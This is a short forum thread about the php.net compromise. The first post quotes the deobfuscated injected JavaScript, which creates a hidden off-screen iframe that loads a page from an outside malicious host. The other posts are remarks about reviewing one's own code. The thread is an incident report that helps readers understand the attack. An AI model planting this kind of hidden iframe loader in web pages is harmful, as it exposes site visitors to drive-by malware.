php.net hacked

Talk about anything in here.
Post Reply
ScTech
Posts: 92
Joined: Sat Aug 24, 2013 8:40 pm

php.net hacked

Post by ScTech »

Php.net has been hacked today. Roughly 5 hours ago it was flagged by all major browsers and google as malware. The attacker injected obfuscated javascript through a gateway into their userprefs.js file. You can read more here. The javascript roughly deobfuscates to:
tmp3 = (tmp2 = document.createElement('iframe')).style;
tmp2.src = 'http://lnkhere.reviewhdtv.co.uk/stat.htm';
tmp1 = (tmp0 = document.createElement('div')).style;
tmp1.width = tmp1.height = '-10000px';
tmp1.overflow = 'hidden';
tmp1.position = 'absolute';
tmp1.left = '-10000px';
tmp4 = document.getElementsByTagName('div');
tmp4[Math.floor(Math.random() * tmp4.length)].appendChild(tmp0).appendChild(tmp2);
Just like mysql.com (got SQL Injected not too long ago), if it can happen to them, it can happen to you.
<?php while(!$succeed = try()); ?>
User avatar
Temor
Posts: 1186
Joined: Thu May 05, 2011 8:04 pm

Re: php.net hacked

Post by Temor »

I really hope this is somewhat contained and not a total breach.

Really makes you think about your own security though...

I am now compelled to go through the code for all my live projects for security flaws. I guess I know what I'll be doing for the rest of the day.
ScTech
Posts: 92
Joined: Sat Aug 24, 2013 8:40 pm

Re: php.net hacked

Post by ScTech »

Haha yes it does. I might just do the same later on. I believe they returned the file to its original contents. No word as of yet on the security breach being patched.
<?php while(!$succeed = try()); ?>
Post Reply